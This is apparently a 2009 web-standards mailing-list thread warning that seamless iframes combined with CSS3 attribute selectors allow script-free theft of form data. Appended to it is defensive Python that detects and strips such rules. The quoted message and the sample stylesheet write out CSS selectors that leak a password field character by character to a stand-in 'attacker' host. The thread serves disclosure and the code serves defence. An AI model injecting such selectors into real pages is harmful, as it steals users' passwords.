I see.  The issue is that the attacker can inject CSS + iframes, but
not script, into one page in an origin.  Now with seamless+CSS3, the
attacker can steal information from the entire origin.  Very cool!


On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <> wrote:
> I sincerely understand why people want seamless iframes on HTML5.. I mean,
> I've been there.. but sometimes the better way to do something is not to do
> it.
> The perfect example is seamless iframes (defined in HTML5) and CSS3
> selectors.
> I have (together with David Lindsay and Gareth Heyes) expressed
> several times that we think this is a bad idea.
> We always receive the same answer "seamless iframes are same-origin!" and
> believe me, I know.. but guess what? javascript is also same origin.. and it
> also creates problems.
> What I see is that those awesome CSS3 selectors such as:
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> create a new type of XSS attack, and those are purely CSS-based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary fields
> from the page WITHOUT the need for JS.
> I really hope people in here know that a cool feature is sometimes not such
> a good idea, and hopefully, we can see how to resolve this issue..
> References: The Sexy Assassin - BlueHat 2008 Presentation
> Favorite XSS - BlackHat 2009 Presentation
> Stefano Di Paola PoC
> Greetings!!
> -- Eduardo
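The defensive counterpart to the selector quoted above, as an added example that is not code from this thread or its authors: a checker for user-supplied CSS that flags (and optionally strips) rules combining an attribute-value probe (`^=`, `$=`, `*=`) with a resource fetched from a non-allowlisted host. The sample stylesheet, the `find_css_exfil_rules` and `strip_css_exfil_rules` names, and the `allowed_hosts` parameter are assumptions for illustration.

```python
import re

# Constructed sample: two probing rules of the kind discussed in the thread,
# plus one benign rule that loads a same-site image.
SAMPLE_CSS = """
input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
input[type=password][value^=b]{background:url("//attacker/password_starts_with=b")}
.logo { background: url(/static/logo.png) }
"""

# Attribute selectors that test a *value* with a substring operator; these are
# what make per-character probing of field contents possible.
ATTR_PROBE = re.compile(r"\[\s*([\w-]+)\s*([\^$*]=)\s*[\"']?([^\"'\]]*)[\"']?\s*\]")
# url(...) pointing at a scheme-relative or absolute remote host.
REMOTE_URL = re.compile(r"url\(\s*[\"']?\s*(?:https?:)?//([^/\"')\s]+)", re.I)
# A flat "selector { declarations }" rule (no nested @-blocks handled here).
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")


def find_css_exfil_rules(css, allowed_hosts=()):
    """Return (selector, attribute, operator, host) for every rule whose selector
    probes an attribute value and whose body loads from a non-allowlisted host."""
    findings = []
    for m in RULE.finditer(css):
        selector, body = m.group(1).strip(), m.group(2)
        probes = ATTR_PROBE.findall(selector)
        if not probes:
            continue  # no value probe, nothing to exfiltrate with
        for u in REMOTE_URL.finditer(body):
            host = u.group(1).lower()
            if host in allowed_hosts:
                continue
            for attr, op, _prefix in probes:
                findings.append((selector, attr, op, host))
    return findings


def strip_css_exfil_rules(css, allowed_hosts=()):
    """Return the stylesheet with every flagged rule removed."""
    def keep(m):
        return "" if find_css_exfil_rules(m.group(0), allowed_hosts) else m.group(0)
    return RULE.sub(keep, css)


if __name__ == "__main__":
    for selector, attr, op, host in find_css_exfil_rules(SAMPLE_CSS):
        print(f"probe on [{attr}{op}] in '{selector}' leaks to {host}")
```

This is a filter for injected stylesheets only; blocking outbound fetches to unknown hosts with a CSP `img-src`/`style-src` policy covers the same leak at the browser level.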